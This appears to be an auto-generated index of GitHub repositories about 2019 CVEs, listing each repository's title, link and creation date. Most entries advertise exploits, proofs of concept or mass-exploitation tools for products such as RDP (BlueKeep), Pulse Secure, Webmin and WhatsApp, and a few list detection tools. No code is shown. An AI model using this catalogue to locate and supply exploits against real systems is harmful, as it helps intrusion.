**None** : [GitHubAssessments/CVE_07_2019](https://api.github.com/repos/GitHubAssessments/CVE_07_2019) create time: 2019-08-10T00:24:28Z

**Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network.** : [lodi-g/CVE-2019-13361](https://api.github.com/repos/lodi-g/CVE-2019-13361) create time: 2019-08-11T20:21:07Z

**Apache Solr DataImport Handler RCE** : [jas502n/CVE-2019-0193](https://api.github.com/repos/jas502n/CVE-2019-0193) create time: 2019-08-09T06:27:39Z

**None** : [nulsect0r/CVE-2019-12889](https://api.github.com/repos/nulsect0r/CVE-2019-12889) create time: 2019-07-10T17:49:51Z

**Proof of Concept of TrustZone exploit ** : [RKX1209/CVE-2019-1010298](https://api.github.com/repos/RKX1209/CVE-2019-1010298) create time: 2019-08-12T15:58:06Z

**OpenEMR security issue** : [Wezery/CVE-2019-14530](https://api.github.com/repos/Wezery/CVE-2019-14530) create time: 2019-08-13T01:33:11Z

**None** : [major203/cve-2019-1181](https://api.github.com/repos/major203/cve-2019-1181) create time: 2019-08-14T03:07:02Z

**Simple Python script for D-Link vulnerability scan and test [CVE-2019-13101]** : [halencarjunior/dlkploit600](https://api.github.com/repos/halencarjunior/dlkploit600) create time: 2019-08-15T01:20:45Z

**Zimbra RCE CVE-2019-9670** : [attackgithub/Zimbra-RCE](https://api.github.com/repos/attackgithub/Zimbra-RCE) create time: 2019-08-16T15:22:27Z

**Zimbra RCE PoC - CVE-2019-9670 XXE/SSRF** : [rek7/Zimbra-RCE](https://api.github.com/repos/rek7/Zimbra-RCE) create time: 2019-08-16T04:37:11Z

**ManageEngine Service Desk Plus 10.0 Privilaged account Hijacking** : [FlameOfIgnis/CVE-2019-10008](https://api.github.com/repos/FlameOfIgnis/CVE-2019-10008) create time: 2019-04-04T18:20:23Z

**CodePath Assignment for Weeks 7 & 8: CVE-2017-14719, CVE-2019-9787 & Unauthenticated Page/Post Content Modification via REST API** : [PalmTreeForest/CodePath_Week_7-8](https://api.github.com/repos/PalmTreeForest/CodePath_Week_7-8) create time: 2019-08-18T04:50:37Z

**Exploit code for CVE-2019-11707 on Firefox 66.0.3 running on Ubuntu ** : [vigneshsrao/CVE-2019-11707](https://api.github.com/repos/vigneshsrao/CVE-2019-11707) create time: 2019-08-18T07:41:01Z

**CVE-2019-10708 SQL injection PoC** : [stavhaygn/CVE-2019-10708](https://api.github.com/repos/stavhaygn/CVE-2019-10708) create time: 2019-08-14T07:15:58Z

**rce exploit , made to work with pocsuite3** : [dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-](https://api.github.com/repos/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-) create time: 2019-08-17T17:23:53Z

**Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0** : [jas502n/CVE-2019-7238](https://api.github.com/repos/jas502n/CVE-2019-7238) create time: 2019-05-21T13:16:02Z

**A Proof of Concept for CVE-2019-14751** : [mssalvatore/CVE-2019-14751_PoC](https://api.github.com/repos/mssalvatore/CVE-2019-14751_PoC) create time: 2019-08-09T16:56:54Z

**CVE-2019-14540 Exploit** : [LeadroyaL/cve-2019-14540-exploit](https://api.github.com/repos/LeadroyaL/cve-2019-14540-exploit) create time: 2019-08-21T03:19:19Z

**CVE-2019-3396 漏洞验证txt与模板文件。** : [skommando/CVE-2019-3396-confluence-poc](https://api.github.com/repos/skommando/CVE-2019-3396-confluence-poc) create time: 2019-08-21T03:30:53Z

**Pulse Secure VPN CVE-2019-11510** : [nuc13us/Pulse](https://api.github.com/repos/nuc13us/Pulse) create time: 2019-08-21T12:03:14Z

**Dockerfiles for CVE-2019-15107(webmin RCE) recurrence including v1.890 and v1.920 with Exp for each version.** : [HACHp1/webmin_docker_and_exp](https://api.github.com/repos/HACHp1/webmin_docker_and_exp) create time: 2019-08-22T08:48:07Z

**CVE-2019-15107 webmin python3** : [AdministratorGithub/CVE-2019-15107](https://api.github.com/repos/AdministratorGithub/CVE-2019-15107) create time: 2019-08-23T11:10:01Z

**Implementation of CVE-2019-15107 exploit in python** : [ketlerd/CVE-2019-15107](https://api.github.com/repos/ketlerd/CVE-2019-15107) create time: 2019-08-22T12:07:16Z

**None** : [LukeJYK/CVE-2019_VIM_test](https://api.github.com/repos/LukeJYK/CVE-2019_VIM_test) create time: 2019-08-24T07:44:10Z

**The official exploit code for Centreon v19.04 Remote Code Execution CVE-2019-13024** : [mhaskar/CVE-2019-13024](https://api.github.com/repos/mhaskar/CVE-2019-13024) create time: 2019-08-24T19:26:19Z

**None** : [Pichuuuuu/CVE-2019-15107](https://api.github.com/repos/Pichuuuuu/CVE-2019-15107) create time: 2019-08-25T05:31:11Z

**Example InSpec profile to detect presence of a malicious rest-client gem (CVE-2019-15224)** : [chef-cft/inspec_cve_2019_15224](https://api.github.com/repos/chef-cft/inspec_cve_2019_15224) create time: 2019-08-23T20:38:44Z

**Pulse Secure SSL VPN pre-auth file reading** : [imjdl/CVE-2019-11510-poc](https://api.github.com/repos/imjdl/CVE-2019-11510-poc) create time: 2019-08-22T08:18:19Z

**PoC for CVE-2019-11510 | Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure vulnerability** : [es0/CVE-2019-11510_poc](https://api.github.com/repos/es0/CVE-2019-11510_poc) create time: 2019-08-26T23:30:15Z

**ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063** : [tim124058/ASUS-SmartHome-Exploit](https://api.github.com/repos/tim124058/ASUS-SmartHome-Exploit) create time: 2019-03-29T06:01:49Z

**Nmap NSE script to detect Pulse Secure SSL VPN file disclosure CVE-2019-11510** : [r00tpgp/http-pulse_ssl_vpn.nse](https://api.github.com/repos/r00tpgp/http-pulse_ssl_vpn.nse) create time: 2019-08-27T03:04:19Z

**SSL VPN Rce** : [jas502n/CVE-2019-11510-1](https://api.github.com/repos/jas502n/CVE-2019-11510-1) create time: 2019-08-27T09:21:10Z

**sup pry0cc :3** : [thugcrowd/CVE-2019-0708](https://api.github.com/repos/thugcrowd/CVE-2019-0708) create time: 2019-05-15T16:33:31Z

**Powershell script to run and determine if a specific device has been patched for CVE-2019-0708. This checks to see if the termdd.sys file has been updated appropriate and is at a version level at or greater than the versions released in the 5/14/19 patches.** : [fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status](https://api.github.com/repos/fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status) create time: 2019-05-16T15:47:29Z

**None** : [jason3e7/CVE-2019-11510](https://api.github.com/repos/jason3e7/CVE-2019-11510) create time: 2019-08-29T07:27:57Z

**Webmin Remote Code Execution (authenticated) ** : [jas502n/CVE-2019-15642](https://api.github.com/repos/jas502n/CVE-2019-15642) create time: 2019-09-01T09:28:56Z

**It will determine your website is vulnerabale to Pulse VPN Vulnerability or not. simply just enter the name of the website.** : [sp4rkhunt3r/CVE2019-11510](https://api.github.com/repos/sp4rkhunt3r/CVE2019-11510) create time: 2019-09-01T11:57:23Z

**Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞** : [jas502n/CVE-2019-3394](https://api.github.com/repos/jas502n/CVE-2019-3394) create time: 2019-08-30T07:44:17Z

**CVE-2019-15107 Webmin RCE (unauthorized)** : [jas502n/CVE-2019-15107](https://api.github.com/repos/jas502n/CVE-2019-15107) create time: 2019-08-19T07:43:16Z

**None** : [MelroyB/CVE-2019-14319](https://api.github.com/repos/MelroyB/CVE-2019-14319) create time: 2019-09-03T11:29:51Z

**Proof of concept for CVE-2019-0708** : [Ekultek/BlueKeep](https://api.github.com/repos/Ekultek/BlueKeep) create time: 2019-05-29T16:53:54Z

**None** : [jaychouzzk/CVE-2019-0193-exp](https://api.github.com/repos/jaychouzzk/CVE-2019-0193-exp) create time: 2019-09-03T21:16:24Z

**Exploit for the Post-Auth RCE vulnerability in Pulse Secure Connect** : [0xDezzy/CVE-2019-11539](https://api.github.com/repos/0xDezzy/CVE-2019-11539) create time: 2019-09-04T13:06:02Z

**None** : [jaychouzzk/Pulse-Secure-SSL-VPN-CVE-2019](https://api.github.com/repos/jaychouzzk/Pulse-Secure-SSL-VPN-CVE-2019) create time: 2019-09-04T17:01:42Z

**CVE-2019-10149** : [ChrissHack/exim.exp](https://api.github.com/repos/ChrissHack/exim.exp) create time: 2019-09-05T20:04:14Z

**bluekeep exploit** : [NAXG/cve_2019_0708_bluekeep_rce](https://api.github.com/repos/NAXG/cve_2019_0708_bluekeep_rce) create time: 2019-09-06T21:39:36Z

**CVE-2019-0708RDP MSF** : [Micr067/CVE-2019-0708RDP-MSF](https://api.github.com/repos/Micr067/CVE-2019-0708RDP-MSF) create time: 2019-09-07T06:32:25Z

**None** : [cpkkcb/CVE-2019-0708-BlueKeep](https://api.github.com/repos/cpkkcb/CVE-2019-0708-BlueKeep) create time: 2019-09-07T06:50:47Z

**CVE-2019-0708 With Metasploit-Framework Exploit** : [FrostsaberX/CVE-2019-0708](https://api.github.com/repos/FrostsaberX/CVE-2019-0708) create time: 2019-09-07T07:32:14Z

**Metasploit module for CVE-2019-0708 (BlueKeep) - https://github.com/rapid7/metasploit-framework/tree/5a0119b04309c8e61b44763ac08811cd3ecbbf8d/modules/exploits/windows/rdp** : [RickGeex/msf-module-CVE-2019-0708](https://api.github.com/repos/RickGeex/msf-module-CVE-2019-0708) create time: 2019-09-06T19:46:03Z

**CVE-2019-0708-EXP(MSF) Vulnerability exploit program for cve-2019-0708** : [qing-root/CVE-2019-0708-EXP-MSF-](https://api.github.com/repos/qing-root/CVE-2019-0708-EXP-MSF-) create time: 2019-09-07T14:02:50Z

**Proof of Concept of ESP32/8266 Wi-Fi vulnerabilties (CVE-2019-12586, CVE-2019-12587, CVE-2019-12588)** : [Matheus-Garbelini/esp32_esp8266_attacks](https://api.github.com/repos/Matheus-Garbelini/esp32_esp8266_attacks) create time: 2019-09-03T15:08:49Z

**EoP POC for CVE-2019-1132** : [Vlad-tri/CVE-2019-1132](https://api.github.com/repos/Vlad-tri/CVE-2019-1132) create time: 2019-07-26T06:51:28Z

**https://fuzzit.dev/2019/07/11/discovering-cve-2019-13504-cve-2019-13503-and-the-importance-of-api-fuzzing/** : [hazedic/fuzzenv-exiv2](https://api.github.com/repos/hazedic/fuzzenv-exiv2) create time: 2019-09-08T12:58:45Z

**CVE 2019-2525 & CVE 2019-2548 working exploit** : [cosdong7/VirtualBox-6.0.0-exploit](https://api.github.com/repos/cosdong7/VirtualBox-6.0.0-exploit) create time: 2019-09-09T16:24:31Z

**CVE 2019-5791 working exploit** : [cosdong7/chromium-v8-exploit](https://api.github.com/repos/cosdong7/chromium-v8-exploit) create time: 2019-09-09T16:47:43Z

**CVE- 2019-0708 مرحبا هذه هي ثغرة الارديبي الاخيرة رقمها ** : [zecopro/bluekeep](https://api.github.com/repos/zecopro/bluekeep) create time: 2019-09-10T14:54:27Z

**None** : [securifera/CVE-2019-1579](https://api.github.com/repos/securifera/CVE-2019-1579) create time: 2019-09-10T02:53:03Z

**None** : [distance-vector/CVE-2019-0708](https://api.github.com/repos/distance-vector/CVE-2019-0708) create time: 2019-09-11T02:19:19Z

**None** : [rogue-kdc/CVE-2019-1253](https://api.github.com/repos/rogue-kdc/CVE-2019-1253) create time: 2019-04-10T09:44:38Z

**None** : [likescam/CVE-2019-1253](https://api.github.com/repos/likescam/CVE-2019-1253) create time: 2019-09-11T09:59:22Z

**investigate vulnerability of opgp-service to message signature bypass (CVE-2019-9153) of openpgp** : [ZenyWay/opgp-service-cve-2019-9153](https://api.github.com/repos/ZenyWay/opgp-service-cve-2019-9153) create time: 2019-09-11T17:17:03Z

**CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。** : [skommando/CVE-2019-0708](https://api.github.com/repos/skommando/CVE-2019-0708) create time: 2019-09-03T10:25:48Z

**Poc for CVE-2019-1253** : [padovah4ck/CVE-2019-1253](https://api.github.com/repos/padovah4ck/CVE-2019-1253) create time: 2019-09-11T20:40:15Z

**Unauthenticated RCE at Woody Ad Snippets / CVE-2019-15858 (PoC)** : [GeneralEG/CVE-2019-15858](https://api.github.com/repos/GeneralEG/CVE-2019-15858) create time: 2019-09-12T21:52:55Z

**CVE-2019-0708 C#验证漏洞** : [0xFlag/CVE-2019-0708-test](https://api.github.com/repos/0xFlag/CVE-2019-0708-test) create time: 2019-09-11T10:58:04Z

**Local privilege escalation PoC exploit for CVE-2019-16098** : [Barakat/CVE-2019-16098](https://api.github.com/repos/Barakat/CVE-2019-16098) create time: 2019-09-10T15:57:36Z

**POC for CVE-2019-14339 Canon PRINT 2.5.5** : [0x48piraj/CVE-2019-14339](https://api.github.com/repos/0x48piraj/CVE-2019-14339) create time: 2019-07-25T09:30:02Z

**AppXSvc Arbitrary File Security Descriptor Overwrite EoP** : [sgabe/CVE-2019-1253](https://api.github.com/repos/sgabe/CVE-2019-1253) create time: 2019-09-11T23:28:59Z

**initial exploit for CVE-2019-0708, BlueKeep CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.** : [wqsemc/CVE-2019-0708](https://api.github.com/repos/wqsemc/CVE-2019-0708) create time: 2019-09-07T00:28:45Z

**https://jira.atlassian.com/browse/JRASERVER-69793** : [0xbug/CVE-2019-8451](https://api.github.com/repos/0xbug/CVE-2019-8451) create time: 2019-09-16T10:39:40Z

**None** : [1aa87148377/CVE-2019-0708](https://api.github.com/repos/1aa87148377/CVE-2019-0708) create time: 2019-09-17T05:15:28Z

**CVE-2019-14912 PoC** : [Wocanilo/adaPwn](https://api.github.com/repos/Wocanilo/adaPwn) create time: 2019-09-17T07:24:23Z

**CVE-2019-14830** : [Fr3d-/moodle-token-stealer](https://api.github.com/repos/Fr3d-/moodle-token-stealer) create time: 2019-09-17T09:04:41Z

**None** : [wzxmt/CVE-2019-1040](https://api.github.com/repos/wzxmt/CVE-2019-1040) create time: 2019-09-17T15:53:25Z

**CVE_2019_15107 Webmin 1.920 Remote Code Execution Exploit** : [g0db0x/CVE_2019_15107](https://api.github.com/repos/g0db0x/CVE_2019_15107) create time: 2019-09-15T22:38:15Z

**CVE-2019-0604: SharePoint RCE detection rules and sample PCAP** : [m5050/CVE-2019-0604](https://api.github.com/repos/m5050/CVE-2019-0604) create time: 2019-09-15T20:06:54Z

**None** : [GitHubAssessments/CVE_Assessment_08_2019](https://api.github.com/repos/GitHubAssessments/CVE_Assessment_08_2019) create time: 2019-09-19T02:02:05Z

**5.1.17之前的Linux内核中普通用户执行文件提权为root用户** : [Huandtx/CVE-2019-13272](https://api.github.com/repos/Huandtx/CVE-2019-13272) create time: 2019-09-19T01:58:35Z

**CVE-2019-16097 PoC** : [evilAdan0s/CVE-2019-16097](https://api.github.com/repos/evilAdan0s/CVE-2019-16097) create time: 2019-09-19T15:12:11Z

**CVE-2019-0708 POC RCE 远程代码执行getshell教程** : [mai-lang-chai/CVE-2019-0708-RCE](https://api.github.com/repos/mai-lang-chai/CVE-2019-0708-RCE) create time: 2019-09-07T05:15:23Z

**CVE-2019-16097-batch** : [rockmelodies/CVE-2019-16097-batch](https://api.github.com/repos/rockmelodies/CVE-2019-16097-batch) create time: 2019-09-20T02:03:45Z

**None** : [stigtsp/CVE-2019-6690-python-gnupg-vulnerability](https://api.github.com/repos/stigtsp/CVE-2019-6690-python-gnupg-vulnerability) create time: 2019-01-20T15:29:46Z

**None** : [ianxtianxt/CVE-2019-16097](https://api.github.com/repos/ianxtianxt/CVE-2019-16097) create time: 2019-09-22T11:24:28Z

**The official exploit code for FusionPBX v4.4.8 Remote Code Execution CVE-2019-15029** : [mhaskar/CVE-2019-15029](https://api.github.com/repos/mhaskar/CVE-2019-15029) create time: 2019-08-24T19:28:36Z

**ProFTPd mod_copy - arbitrary file copy without authentication** : [KTN1990/CVE-2019-12815](https://api.github.com/repos/KTN1990/CVE-2019-12815) create time: 2019-07-27T21:26:06Z

**CVE-2019-1367** : [mandarenmanman/CVE-2019-1367](https://api.github.com/repos/mandarenmanman/CVE-2019-1367) create time: 2019-09-24T06:11:10Z

**None** : [ianxtianxt/CVE-2019-8451](https://api.github.com/repos/ianxtianxt/CVE-2019-8451) create time: 2019-09-24T11:38:20Z

**Bluekeep(CVE 2019-0708) exploit released** : [TinToSer/bluekeep-exploit](https://api.github.com/repos/TinToSer/bluekeep-exploit) create time: 2019-09-06T17:03:53Z

**cve-2019-1609** : [dacade/cve-2019-16097](https://api.github.com/repos/dacade/cve-2019-16097) create time: 2019-09-25T02:05:49Z

**Vbulletin rce exploit CVE-2019-16759** : [M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit](https://api.github.com/repos/M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit) create time: 2019-09-25T16:12:27Z

**None** : [jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-](https://api.github.com/repos/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-) create time: 2019-09-25T16:22:56Z

**Built a custom Virtual Machine, running Ubuntu 18.04.1 and Webmin 1.810. Using CVE-2019-15107 to exploit a backdoor in the Linux machine** : [Rayferrufino/Make-and-Break](https://api.github.com/repos/Rayferrufino/Make-and-Break) create time: 2019-09-23T14:07:03Z

**Nmap NSE Script to Detect vBulletin pre-auth 5.x RCE CVE-2019-16759** : [r00tpgp/http-vuln-CVE-2019-16759](https://api.github.com/repos/r00tpgp/http-vuln-CVE-2019-16759) create time: 2019-09-26T03:27:17Z

**vBulletin 5.x 未授权远程代码执行漏洞** : [jas502n/CVE-2019-16759](https://api.github.com/repos/jas502n/CVE-2019-16759) create time: 2019-09-26T03:56:22Z

**WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit ** : [pimps/CVE-2019-2725](https://api.github.com/repos/pimps/CVE-2019-2725) create time: 2019-08-23T01:42:57Z

**CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)** : [jas502n/CVE-2019-10392](https://api.github.com/repos/jas502n/CVE-2019-10392) create time: 2019-09-26T05:45:00Z

**A tool that detect if your node has been victim of the invalid funding tx attack.** : [ACINQ/detection-tool-cve-2019-13000](https://api.github.com/repos/ACINQ/detection-tool-cve-2019-13000) create time: 2019-09-27T08:07:07Z

**A tool to check if your lnd node was targeted by CVE-2019-12999** : [lightninglabs/chanleakcheck](https://api.github.com/repos/lightninglabs/chanleakcheck) create time: 2019-09-27T03:47:09Z

**POC to check for Jira instances vulnerable to CVE-2019-8451** : [h0ffayyy/Jira-CVE-2019-8451](https://api.github.com/repos/h0ffayyy/Jira-CVE-2019-8451) create time: 2019-09-28T01:01:26Z

**cve_20190708复现使用到的镜像及工具** : [Huandtx/cve_20190708](https://api.github.com/repos/Huandtx/cve_20190708) create time: 2019-09-28T09:58:18Z

**Jira未授权SSRF漏洞** : [jas502n/CVE-2019-8451](https://api.github.com/repos/jas502n/CVE-2019-8451) create time: 2019-09-26T05:06:11Z

**None** : [jltxgcy/CVE_2019_2025_EXP](https://api.github.com/repos/jltxgcy/CVE_2019_2025_EXP) create time: 2019-09-30T02:40:21Z

**it works on xp (all version sp2 sp3)** : [coolboy4me/cve-2019-0708_bluekeep_rce](https://api.github.com/repos/coolboy4me/cve-2019-0708_bluekeep_rce) create time: 2019-09-29T07:38:41Z

**Arbitrary file read in BlueStacks** : [seqred-s-a/cve-2019-14220](https://api.github.com/repos/seqred-s-a/cve-2019-14220) create time: 2019-09-30T12:57:35Z

**Metasploit module for massive Denial of Service using #Bluekeep vector.** : [mekhalleh/cve-2019-0708](https://api.github.com/repos/mekhalleh/cve-2019-0708) create time: 2019-07-14T18:43:48Z

**harbor(<1.7.6/1.8.3) privilege escalation (CVE-2019-16097)** : [theLSA/harbor-give-me-admin](https://api.github.com/repos/theLSA/harbor-give-me-admin) create time: 2019-10-02T16:53:06Z

**Stored Cross-Site Scripting in DotNetNuke (DNN) Version before 9.4.0 | XSS to RCE** : [MAYASEVEN/CVE-2019-12562](https://api.github.com/repos/MAYASEVEN/CVE-2019-12562) create time: 2019-10-03T16:29:58Z

**Create an exploit to libssh2 vulnerabulity described in CVE-2019-13115** : [CSSProject/libssh2-Exploit](https://api.github.com/repos/CSSProject/libssh2-Exploit) create time: 2019-10-03T17:58:03Z

**PoC for CVE-2019-16941** : [purpleracc00n/CVE-2019-16941](https://api.github.com/repos/purpleracc00n/CVE-2019-16941) create time: 2019-10-01T10:26:27Z

**(FAB-2019-00157) Vulnerability discoverd by me CVE-2019-15233** : [l0nax/CVE-2019-15233](https://api.github.com/repos/l0nax/CVE-2019-15233) create time: 2019-08-20T13:05:56Z

**(FAB-2019-00156) Vulnerability discoverd by me CVE-2019-15053 ** : [l0nax/CVE-2019-15053](https://api.github.com/repos/l0nax/CVE-2019-15053) create time: 2019-08-14T18:35:36Z

**Connect Box CH7465LG (CVE-2019-13025)** : [x1tan/CVE-2019-13025](https://api.github.com/repos/x1tan/CVE-2019-13025) create time: 2019-10-01T20:53:47Z

**Rails 3 PoC of CVE-2019-5418** : [ztgrace/CVE-2019-5418-Rails3](https://api.github.com/repos/ztgrace/CVE-2019-5418-Rails3) create time: 2019-10-04T19:28:10Z

**Confluence Widget Connector path traversal (CVE-2019-3396)** : [x-f1v3/CVE-2019-3396](https://api.github.com/repos/x-f1v3/CVE-2019-3396) create time: 2019-04-09T06:20:51Z

**None** : [spektraq/CVE-2019-WHATSAPP](https://api.github.com/repos/spektraq/CVE-2019-WHATSAPP) create time: 2019-10-06T14:20:38Z

**None** : [infiniteLoopers/CVE-2019-11932](https://api.github.com/repos/infiniteLoopers/CVE-2019-11932) create time: 2019-10-06T14:54:35Z

**None** : [d3k4z/nmap-cve2019-15846](https://api.github.com/repos/d3k4z/nmap-cve2019-15846) create time: 2019-10-07T08:40:47Z

**Double-Free BUG in WhatsApp exploit poc.** : [TulungagungCyberLink/CVE-2019-11932](https://api.github.com/repos/TulungagungCyberLink/CVE-2019-11932) create time: 2019-10-05T06:24:08Z

**CVE-2019-17080 ** : [materaj2/Mintinstall-object-injection](https://api.github.com/repos/materaj2/Mintinstall-object-injection) create time: 2019-10-18T18:52:17Z

**CVE-2019-17080 ** : [Andhrimnirr/Mintinstall-object-injection](https://api.github.com/repos/Andhrimnirr/Mintinstall-object-injection) create time: 2019-10-02T08:26:34Z

**None** : [raystyle/CVE-2019-2215](https://api.github.com/repos/raystyle/CVE-2019-2215) create time: 2019-10-12T03:22:27Z

**The exploit works well until WhatsApp version 2.19.230. The vulnerability is official patched in WhatsApp version 2.19.244** : [alexanderstonec/CVE-2019-11932](https://api.github.com/repos/alexanderstonec/CVE-2019-11932) create time: 2019-10-09T16:41:38Z

**CVE-2019-0708** : [shishibabyq/CVE-2019-0708](https://api.github.com/repos/shishibabyq/CVE-2019-0708) create time: 2019-10-10T00:34:41Z

**PoC materials to exploit CVE-2019-15846** : [synacktiv/Exim-CVE-2019-15846](https://api.github.com/repos/synacktiv/Exim-CVE-2019-15846) create time: 2019-10-09T15:19:58Z

**KRAMER VIAware 2.5.0719.1034 - Remote Code Execution** : [hessandrew/CVE-2019-17124](https://api.github.com/repos/hessandrew/CVE-2019-17124) create time: 2019-10-09T04:10:25Z

**Exploit code for CVE-2019-16692** : [kkirsche/CVE-2019-16692](https://api.github.com/repos/kkirsche/CVE-2019-16692) create time: 2019-09-27T13:18:00Z

**Mass exploit for CVE-2019-0708** : [pwnhacker0x18/Wincrash](https://api.github.com/repos/pwnhacker0x18/Wincrash) create time: 2019-10-11T20:33:35Z

**Interactive-Like Command-Line Console for CVE-2019-16759** : [FarjaalAhmad/CVE-2019-16759](https://api.github.com/repos/FarjaalAhmad/CVE-2019-16759) create time: 2019-10-12T18:51:16Z

**Spring Security OAuth 2.3 Open Redirection 分析复现篇** : [BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection](https://api.github.com/repos/BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection) create time: 2019-10-14T02:15:39Z

**OpenEMR Security issue** : [Wezery/CVE-2019-14529](https://api.github.com/repos/Wezery/CVE-2019-14529) create time: 2019-08-13T01:01:51Z

**Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215** : [kangtastic/cve-2019-2215](https://api.github.com/repos/kangtastic/cve-2019-2215) create time: 2019-10-14T17:27:37Z

**Directory transversal to remote code execution** : [jas502n/CVE-2019-16278](https://api.github.com/repos/jas502n/CVE-2019-16278) create time: 2019-10-15T03:40:13Z

**None** : [FauxFaux/sudo-cve-2019-14287](https://api.github.com/repos/FauxFaux/sudo-cve-2019-14287) create time: 2019-10-15T06:47:58Z

**CVE-2019-16728 Proof of Concept** : [imjdl/CVE-2019-16278-PoC](https://api.github.com/repos/imjdl/CVE-2019-16278-PoC) create time: 2019-10-15T09:22:36Z

**(CVE-2019-16279)dos** : [ianxtianxt/CVE-2019-16279](https://api.github.com/repos/ianxtianxt/CVE-2019-16279) create time: 2019-10-15T12:43:28Z

**macOS Kernel Exploit for CVE-2019-8781. Credit for the bug goes to @LinusHenze :)** : [A2nkF/macOS-Kernel-Exploit](https://api.github.com/repos/A2nkF/macOS-Kernel-Exploit) create time: 2019-09-17T17:59:26Z

**Sudo exploit** : [n0w4n/CVE-2019-14287](https://api.github.com/repos/n0w4n/CVE-2019-14287) create time: 2019-10-15T19:26:42Z

**This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability. ** : [valbrux/CVE-2019-11932-SupportApp](https://api.github.com/repos/valbrux/CVE-2019-11932-SupportApp) create time: 2019-10-16T10:04:30Z

**None** : [gurneesh/CVE-2019-14287-write-up](https://api.github.com/repos/gurneesh/CVE-2019-14287-write-up) create time: 2019-10-16T14:47:08Z

**Programa para hackear Whatsapp Mediante Gif ,asiendo un exploit con el puerto.** : [fastmo/CVE-2019-11932](https://api.github.com/repos/fastmo/CVE-2019-11932) create time: 2019-10-16T20:13:23Z

**CVE-2019-2890 Exploit for WebLogic with T3** : [ZO1RO/CVE-2019-2890](https://api.github.com/repos/ZO1RO/CVE-2019-2890) create time: 2019-10-17T02:46:00Z

**cve-2019-0604 SharePoint RCE exploit** : [k8gege/CVE-2019-0604](https://api.github.com/repos/k8gege/CVE-2019-0604) create time: 2019-06-26T15:00:29Z

**cve2019-2215 poc for 3.18 kernel** : [CrackerCat/cve2019-2215-3.18](https://api.github.com/repos/CrackerCat/cve2019-2215-3.18) create time: 2019-10-21T01:46:26Z

**LPE Exploit For CVE-2019-12181 (Serv-U FTP 15.1.6)** : [guywhataguy/CVE-2019-12181](https://api.github.com/repos/guywhataguy/CVE-2019-12181) create time: 2019-06-12T22:18:45Z

**None** : [Janette88/cve-2019-14287sudoexp](https://api.github.com/repos/Janette88/cve-2019-14287sudoexp) create time: 2019-10-21T01:54:45Z

**Jenkins Git Client RCE CVE-2019-10392_Exp** : [ftk-sostupid/CVE-2019-10392_EXP](https://api.github.com/repos/ftk-sostupid/CVE-2019-10392_EXP) create time: 2019-09-29T11:22:41Z

**kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609** : [jas502n/kibana-RCE](https://api.github.com/repos/jas502n/kibana-RCE) create time: 2019-10-18T03:25:22Z

**None** : [pr0tean/CVE-2019-13051](https://api.github.com/repos/pr0tean/CVE-2019-13051) create time: 2019-10-22T15:00:48Z

**exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts** : [LandGrey/CVE-2019-7609](https://api.github.com/repos/LandGrey/CVE-2019-7609) create time: 2019-10-21T15:31:13Z

**Double-free vulnerability in DDGifSlurp in decoding.c in libpl_droidsonroids_gif can read more https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/** : [mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit](https://api.github.com/repos/mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit) create time: 2019-10-23T08:02:15Z

**CVE-2019-11043** : [B1gd0g/CVE-2019-11043](https://api.github.com/repos/B1gd0g/CVE-2019-11043) create time: 2019-10-23T13:32:14Z

**None** : [tinker-li/CVE-2019-11043](https://api.github.com/repos/tinker-li/CVE-2019-11043) create time: 2019-10-23T13:34:28Z

**CVE-2019-16278 Python3 Exploit Code** : [darkerego/Nostromo_Python3](https://api.github.com/repos/darkerego/Nostromo_Python3) create time: 2019-10-23T22:24:18Z

**Instructions for installing a vulnerable version of Exim and its expluatation** : [darsigovrustam/CVE-2019-10149](https://api.github.com/repos/darsigovrustam/CVE-2019-10149) create time: 2019-10-21T08:13:27Z

**None** : [ianxtianxt/CVE-2019-11043](https://api.github.com/repos/ianxtianxt/CVE-2019-11043) create time: 2019-10-24T09:09:01Z

**None** : [fairyming/CVE-2019-11043](https://api.github.com/repos/fairyming/CVE-2019-11043) create time: 2019-10-24T09:12:38Z

**Demonstration of Go's dsa.Verify bug (CVE-2019-17596)** : [pquerna/poc-dsa-verify-CVE-2019-17596](https://api.github.com/repos/pquerna/poc-dsa-verify-CVE-2019-17596) create time: 2019-10-19T23:32:02Z

**CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.** : [Diefunction/CVE-2019-10149](https://api.github.com/repos/Diefunction/CVE-2019-10149) create time: 2019-10-27T01:03:11Z

